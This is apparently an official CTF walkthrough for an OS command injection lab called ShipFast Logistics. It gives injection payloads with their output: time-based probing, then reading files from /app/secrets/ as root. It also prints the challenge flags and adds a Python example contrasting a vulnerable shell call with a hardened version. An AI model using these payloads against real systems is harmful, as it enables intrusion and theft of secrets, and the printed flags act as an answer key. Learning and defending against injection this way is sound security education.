HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

ShipFast Logistics

Command Injection · OS Command Injection
Difficulty: Intermediate
Vuln class: OS Command Injection
Steps: 4
// Objective
Identify the injectable feature among three OS-touching inputs, exploit it, and extract two flags from /app/secrets/.
// Tools required
Browser, Burp Suite, curl
// Step-by-step walkthrough
1. Identify the injectable input
ShipFast has three features that interact with the OS: a network connectivity checker, a PDF report generator, and an archive download tool. Test each with a sleep payload to find which passes input to a shell command.
Command / Input
; sleep 3
Measure response time. Only the network checker takes 3+ extra seconds — that's your target.
2. Confirm injection and enumerate
With the network checker confirmed, chain commands to explore the server.
Command / Input
127.0.0.1; id
127.0.0.1; ls /app/secrets/
Output
uid=0(root) gid=0(root) groups=0(root)
admin.txt root.txt
3. Extract Flag 1
Read the first flag from admin.txt.
Command / Input
127.0.0.1; cat /app/secrets/admin.txt
Output
HackrGG{sh1pf4st_cmdi_3xf1ltr4t3d}
4. Extract Flag 2
Read the second flag from root.txt.
Command / Input
127.0.0.1; cat /app/secrets/root.txt
Output
HackrGG{sh1pf4st_4dm1n_s3cr3t_l34k3d}
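The root cause in step 1 is a network checker that splices the host field into a string handed to a shell, which is why "; sleep 3" costs three extra seconds. The following is an added illustration written for this walkthrough, not ShipFast's source and not code from hackr.gg: it shows the injectable string construction next to a hardened version that allow-lists the host (IP literal or RFC 1123 hostname) and runs ping as an argv list with no shell. The function names and the "ping -c 1" command line are assumptions for the example.

```python
"""Connectivity checker, vulnerable pattern beside a hardened one.
Hypothetical example code; not the ShipFast application's source."""
import ipaddress
import re
import subprocess

# One DNS label: 1-63 chars, alphanumeric at both ends, hyphens allowed inside.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def build_shell_command_vulnerable(host: str) -> str:
    """The injectable pattern: user input spliced into one string that a shell
    will parse. Returned rather than executed so the reader can see exactly
    what /bin/sh would receive for a given host value."""
    return f"ping -c 1 {host}"


def validate_host(host: str) -> bool:
    """Allow-list check: accept an IPv4/IPv6 literal or a hostname made of
    valid labels. Shell metacharacters, whitespace, an empty string and a
    leading '-' all fail, so the check never has to know which characters
    are dangerous for a particular shell."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(host) is not None


def build_ping_argv(host: str) -> list:
    """Hardened form: validated input, argv list, no shell. The '--' relies on
    the getopt end-of-options convention so that a value starting with '-'
    could never be read as a ping flag (argument injection) even if the
    validator were loosened later."""
    if not validate_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", "--", host]


def run_connectivity_check(host: str, timeout: float = 5.0) -> bool:
    """Execute the hardened argv with a timeout. Because subprocess receives a
    list (shell=False is the default), ';', '|' and '$()' in the host value
    are just bytes inside one argument, never command separators."""
    result = subprocess.run(build_ping_argv(host), capture_output=True,
                            timeout=timeout, check=False)
    return result.returncode == 0


if __name__ == "__main__":
    # Constructed sample inputs: two benign hosts and two injection attempts.
    for candidate in ["127.0.0.1", "example.com", "127.0.0.1; sleep 3", "-c 1000000"]:
        print(f"{candidate!r:24} shell would see: {build_shell_command_vulnerable(candidate)!r}")
        print(f"{'':24} hardened check allows: {validate_host(candidate)}")
```

Two points worth noting for anyone fixing a checker like this: dropping the shell alone is not enough, because a host value beginning with "-" can still be parsed by ping as an option, so the allow-list and the "--" separator belong together; and the time-based probe used in step 1 doubles as a cheap regression test, since a patched checker should show no latency difference for a payload containing "sleep".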
// Flag
Flag value
HackrGG{sh1pf4st_cmdi_3xf1ltr4t3d}
Both flags in /app/secrets/ — admin.txt and root.txt.